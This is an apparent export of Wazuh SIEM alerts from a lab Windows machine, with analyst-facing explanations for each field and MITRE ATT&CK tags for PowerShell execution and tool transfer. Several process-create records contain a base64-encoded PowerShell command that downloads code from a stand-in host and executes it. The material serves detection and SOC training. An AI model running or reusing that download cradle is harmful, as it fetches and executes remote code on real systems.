Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534240.1385031
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:17.5585591Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283600
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:17.547 ProcessGuid: {94294ddc-bd1c-680a-3d0b-000000000e00} ProcessId: 13236 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_r3nbxliw.do2.ps1 CreationUtcTime: 2025-04-24 22:37:17.547 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:17.547
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd1c-680a-3d0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13236
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_r3nbxliw.do2.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:17.547
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:22.835+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:22.835+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  50
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534242.1387800
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:20.0085171Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283657
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:18.706 ProcessGuid: {94294ddc-bd1e-680a-3f0b-000000000e00} ProcessId: 14648 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd1c-680a-3d0b-000000000e00} ParentProcessId: 13236 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:18.706
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd1e-680a-3f0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14648
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd1c-680a-3d0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13236
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:22.983+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:22.983+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  54
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534242.1395871
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:20.2262631Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283660
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:20.190 ProcessGuid: {94294ddc-bd1e-680a-3f0b-000000000e00} ProcessId: 14648 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mzprdnal.c0e.ps1 CreationUtcTime: 2025-04-24 22:37:20.190 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:20.190
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd1e-680a-3f0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14648
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mzprdnal.c0e.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:20.190
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:26.463+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:26.463+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  51
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534246.1398640
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:23.7195139Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283756
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:21.851 ProcessGuid: {94294ddc-bd21-680a-440b-000000000e00} ProcessId: 11516 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd1e-680a-3f0b-000000000e00} ParentProcessId: 14648 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:21.851
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd21-680a-440b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11516
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd1e-680a-3f0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  14648
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:26.587+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:26.587+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  55
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534246.1406711
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
